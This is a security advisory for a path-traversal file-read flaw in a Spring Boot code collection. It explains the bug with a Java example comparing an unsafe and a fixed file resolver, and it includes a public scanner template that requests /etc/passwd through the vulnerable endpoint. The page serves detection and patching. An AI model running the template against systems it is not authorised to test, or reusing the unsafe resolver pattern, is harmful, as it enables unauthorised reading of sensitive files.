CVE-2025-46822: Java-springboot-codebase 1.1 - Arbitrary File Read

Date: 2025-08-01 | Affected software: Java springboot codebase | PoC: public

Vulnerability description

OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient validation of the requested file path made absolute path traversal possible: a client could hand the file-serving endpoint an absolute path (the PoC below requests /etc/passwd through /api/v1/files/) and read files outside the intended directory. This allows unauthorized, unauthenticated access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.
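The following is an added illustration of the underlying mechanism; it is not code from OsamaTaher/Java-springboot-codebase or from the fixing commit. In java.nio.file, Path.resolve(other) returns other unchanged when other is absolute, so a handler that builds BASE.resolve(userInput) silently leaves its base directory on input such as "/etc/passwd". The base directory /srv/app/files and the method names are assumptions for this example. The hardened variant treats the input as relative, normalizes it, and then verifies component-wise containment with Path.startsWith, which also catches "../" traversal and sibling directories with a common prefix.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Added example (not the project's code): absolute path traversal through
 * Path.resolve() and a containment check that closes it.
 */
public class SafeFileResolver {

    // Hypothetical base directory for served files; assumed for this example only.
    static final Path BASE = Paths.get("/srv/app/files").toAbsolutePath().normalize();

    /**
     * Vulnerable pattern: when `requested` is absolute, Path.resolve() discards
     * BASE and returns `requested` itself, so "/etc/passwd" resolves to /etc/passwd.
     */
    static Path resolveUnsafe(String requested) {
        return BASE.resolve(requested).normalize();
    }

    /**
     * Hardened pattern: strip leading separators so the input is always treated
     * as relative, normalize away "." and "..", then require that the result
     * still lies under BASE (component-wise, so /srv/app/files2 is rejected too).
     */
    static Path resolveSafe(String requested) {
        String relative = requested.replaceFirst("^[/\\\\]+", "");
        Path candidate = BASE.resolve(relative).normalize();
        if (!candidate.startsWith(BASE)) {
            throw new SecurityException("path escapes base directory: " + requested);
        }
        return candidate;
    }

    public static void main(String[] args) {
        // Constructed sample inputs: a benign name, the absolute path from the
        // PoC, a dot-dot traversal, and a traversal that stays inside BASE.
        String[] inputs = {"report.txt", "/etc/passwd", "../../etc/passwd", "sub/../report.txt"};
        for (String in : inputs) {
            System.out.println("unsafe  " + in + " -> " + resolveUnsafe(in));
            try {
                System.out.println("safe    " + in + " -> " + resolveSafe(in));
            } catch (SecurityException e) {
                System.out.println("safe    " + in + " -> rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

Run with `java SafeFileResolver.java`. The unsafe resolver maps "/etc/passwd" straight to /etc/passwd and "../../etc/passwd" to /srv/etc/passwd; the safe resolver keeps the first inside BASE as /srv/app/files/etc/passwd (a harmless, probably nonexistent file) and rejects the second. Normalizing before the startsWith check matters: checking the unnormalized path would let "/srv/app/files/../../etc/passwd" through.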

PoC code [public]

id: CVE-2025-46822

info:
  name: Java-springboot-codebase 1.1 - Arbitrary File Read
  author: haliteroglu25
  severity: high
  description: |
    OsamaTaher/Java-springboot-codebase is a collection of Java and Spring Boot code snippets, applications, and projects. Prior to commit c835c6f7799eacada4c0fc77e0816f250af01ad2, insufficient path traversal mechanisms make absolute path traversal possible. This vulnerability allows unauthorized access to sensitive internal files. Commit c835c6f7799eacada4c0fc77e0816f250af01ad2 contains a patch for the issue.
  reference:
    - https://github.com/OsamaTaher/Java-springboot-codebase
    - https://nvd.nist.gov/vuln/detail/CVE-2025-46822
    - https://github.com/OsamaTaher/Java-springboot-codebase/security/advisories/GHSA-q6mm-cm37-w637
    - https://github.com/OsamaTaher/Java-springboot-codebase/commit/c835c6f7799eacada4c0fc77e0816f250af01ad2
    - https://github.com/PuddinCat/GithubRepoSpider
  classification:
    epss-score: 0.14383
    epss-percentile: 0.94196
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,java,springboot,codebase,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "Whitelabel Error Page","explicit mapping")'
        internal: true

  - raw:
      - |
        GET /api/v1/files/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402200cee10d58e8da28404ac6f2a558dd68b3b1e47ccd959cae471169626dc04b52c022070cba7179b19efc57eae7cc69220c74aac826b963f79365cb451a444e4300f7e:922c64590222798bb761d5b6d8e72950
